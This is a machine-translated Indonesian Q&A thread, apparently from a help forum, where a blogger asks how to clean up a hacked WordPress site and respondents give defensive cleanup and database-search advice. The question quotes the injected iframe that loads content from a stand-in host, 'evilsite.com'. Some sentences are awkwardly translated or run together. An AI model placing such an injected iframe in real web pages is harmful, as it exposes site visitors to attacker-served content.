Blog WordPress for-fun saya di http://fakeplasticrock.com (menjalankan WordPress 3.1.1) diretas - itu menunjukkan <iframe>
pada setiap halaman seperti:
<iframe src="http://evilsite.com/go/1"></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
Saya melakukan yang berikut
- Diupgrade ke 3.1.3 melalui sistem peningkatan WordPress bawaan
- Menginstal Exploit Scanner (banyak peringatan penting pada file yang tidak biasa) dan AntiVirus (ini menunjukkan semua hijau dan bersih, jadi saya menghapus dan menghapusnya setelah menjalankan)
- Mengubah kata sandi MySQL.
- Mengubah semua kata sandi pengguna WordPress.
- Terhubung melalui FTP dan mengunduh seluruh sistem file (tidak besar, ini adalah host bersama Linux WordPress saja)
- Menyebarkan sistem file terhadap ZIP resmi WordPress 3.1.3 dan menghapus atau menimpa apa pun yang tidak cocok.
Saya cukup yakin itu
- semua file pada disk adalah file WordPress 3.1.3 resmi
- tidak ada file "ekstra" pada disk selain yang saya
/theme
miliki, plugin Exploit Scanner (yang baru saja saya unduh),/uploads
folder, dan beberapa file kecil lainnya yang diharapkan. Plugin saya yang lain, wp-recaptcha, cocok dengan versi resmi yang diunduh saat ini. - Saya juga memeriksa
.htaccess
file dan tidak ada yang salah di sana
Saya tidak menyentuh basis data , tetapi saya berjuang untuk memikirkan bagaimana segala sesuatu di dalam basis data dapat berbahaya tanpa kode PHP khusus untuk membuatnya berfungsi?
Blog WordPress saya muncul OK dan bebas hack sekarang (saya pikir), tetapi apakah ada hal lain yang harus saya periksa?
Jawaban:
Sudahkah Anda mengidentifikasi vektor exploit? Jika tidak, Anda mungkin membiarkan diri Anda terbuka untuk dieksploitasi di masa depan.
Hal-hal lain yang perlu dipertimbangkan:
Ubah awalan tabel db.htaccess
sumber
Melihat pesan "penjelajahan aman" Google Chrome, Anda mendapatkan ".cc iFrame hack" yang tampaknya banyak terjadi akhir-akhir ini. Saya pikir 3.1.3 akan memperbaiki ini, tetapi periksa file index.php Anda di root jika situs Anda, di situlah terus memukul saya sampai saya mendapatkan SEMUA yang diperbarui dan kata sandi diubah.
Ada beberapa hal yang SANGAT rumit yang dapat dilakukan orang dengan injeksi pos dan komentar. Anda dapat menjalankan kueri berikut terhadap basis data Anda untuk membantu menemukan beberapa di antaranya. Saya membuat blog "pelacakan" lainnya di sini .
Semoga ini membantu!
sumber
SELECT * FROM wp_* WHERE comment_content LIKE '%<?%'
danSELECT * FROM wp_* WHERE comment_content LIKE '%<?php%'
hanya untuk memastikan ...Basis data juga dapat berisi kode berbahaya: akun pengguna tersembunyi atau nilai yang dicetak tanpa terhapus di suatu tempat. Juga, periksa direktori unggahan Anda untuk file yang bukan miliknya.
Oh, dan coba pahami bagaimana penyerang menemukan jalannya ke situs Anda. Pada akun bersama, sering kali seluruh server. Periksa situs lain di server untuk mengetahui blog yang diretas atau halaman lain juga. Baca log FTP Anda. Jika Anda tidak tahu bagaimana itu terjadi, Anda tidak dapat mencegah jeda berikutnya.
sumber
wp_users
tabel dan hanya 2 baris, keduanya diharapkan .. tidak ada dalam/upload
folder yang tidak biasa (hanya gifs dan pngs dan jpegs)Maaf mendengar Anda diretas - sepertinya Anda telah melakukan pekerjaan pemulihan dengan baik!
Sistem file Anda kedengarannya emas, saya tidak akan mengatakan ada hal lain yang bisa Anda lakukan di sini.
Saya akan berpikir Exploit Scanner akan memberikan peringatan jika ia menemukan skrip, iframe, PHP (meskipun hanya berbahaya jika dievaluasi), atau kode tidak biasa lainnya di database Anda.
Saya tidak yakin apakah itu memeriksa tabel selain dari posting & komentar, mungkin perlu memeriksa
/wp-admin/options.php
sekilas dan melihat apakah Anda melihat sesuatu yang aneh.Saya juga akan memeriksa tabel pengguna Anda di klien MySQL (pengguna mungkin ada di database tetapi tidak terlihat di admin).
sumber
Periksa alat Google Webmaster untuk dua hal:
Juga, saya akan menerapkan kembali tema, atau memeriksanya dengan sangat hati-hati. Beberapa baris PHP dapat mendefinisikan kembali fungsi PHP inti sehingga mereka mengekstrak kode jahat dari database, terutama tabel wp_options key / value store
sumber
Cari database melalui phpmyadmin untuk "iframe" atau buang database dan cari teks.
Dan periksa untuk pengguna yang tidak terlihat di tabel pengguna; Saya telah melihat pengguna di tabel yang tidak muncul di WP Admin >> Pengguna.
Opsi Bersihkan «Plugin WordPress akan menunjukkan sampah apa yang tersisa dari plugin yang lama dan kemungkinan rentan dalam database.
Tema Anda juga tidak memiliki
<head>
tag, jadi saya akan memeriksa jika Anda mengedit tema untuk menghapus tautan buruk.Dan yang biasa: dan Bagaimana menemukan pintu belakang di WordPress yang diretas dan Pengerasan WordPress «WordPress Codex
sumber
"Apakah ada hal lain yang harus saya periksa?" Anda perlu memeriksa proses Anda, dan mencari tahu bagaimana Anda diretas (hampir pasti karena Anda tidak menambal waktu, atau dengan benar) dan memperbaikinya juga, bukan hanya gejalanya.
sumber
Itu terjadi pada saya sekali, melalui kebocoran pada mediatemple. Saya harus menulis plugin untuk memeriksa basis data untuk tautan yang disuntikkan. Anda dapat mengambilnya di sini sebagai inti github .
Ini sangat user friendly, memiliki beberapa langkah yang memberikan umpan balik dan memeriksa ulang database Anda setelah Anda selesai.
Semoga berhasil!
sumber
Saya memiliki retasan yang sangat mirip dengan yang harus saya perbaiki di salah satu situs klien saya.
Ada skrip berbahaya dalam sistem file (hal-hal php base64_decode). Namun, tabel 'posting' & 'komentar' database telah dikompromikan dan kode iframe juga tersebar di data itu.
Setidaknya saya akan menjalankan beberapa pencarian di DB, hanya untuk aman. :)
sumber
Periksa plugin Anda!, Sejauh tahun ini telah ada 60 rilis exploit dari plugin .org, saya akan menduga angka sebenarnya jauh lebih tinggi karena tidak ada yang benar-benar melakukan hal ini secara penuh.
Anda mencantumkan bahwa Anda hanya memiliki satu plugin, baik itu memiliki lubang keamanan (tidak yakin berapa lama itu, dan mungkin bukan vektor).
Penulis menyatakan ia menulis ulang dengan versi 3.0, tetapi tidak disebutkan patch keamanannya.
http://www.wpsecure.net/2011/03/wp-recaptcha-plugin/
Ubah log: http://wordpress.org/extend/plugins/wp-recaptcha/changelog/
sumber
Saya menggunakan server cloud dan memiliki nomor port ssh aneh acak tidak ada ftp sama sekali. Kata sandi sangat sulit diretas. Semua akses root sepenuhnya ditolak. Saya setuju bahwa WordPress tidak akan menjadi biang keladi Anda. Hal lain yang perlu diperiksa adalah sesi ftp tidak menutup, virus di komputer pribadi Anda (ingat Anda dapat memuat file ke situs Anda dan siapa pun yang memuat file itu bisa mendapatkan virus yang sama), juga jangan simpan kata sandi Anda di situs publik atau pribadi situs selalu benar di atas kertas tidak pernah pada dokumen atau notepad kata.
Terakhir tanyakan kepada host Anda apakah mereka baru-baru ini melakukan pelanggaran karena mereka seharusnya memiliki pengaturan firewall
sumber
Periksa tanggal file Anda. Tidak ada file yang harus memiliki perubahan data yang lebih baru dari edit / instal terakhir Anda!
Tapi ini juga bisa dipalsukan. Cara paling pasti untuk memastikan adalah membandingkan (mis. Membandingkan hash) semua file dengan file instalasi asli.
sumber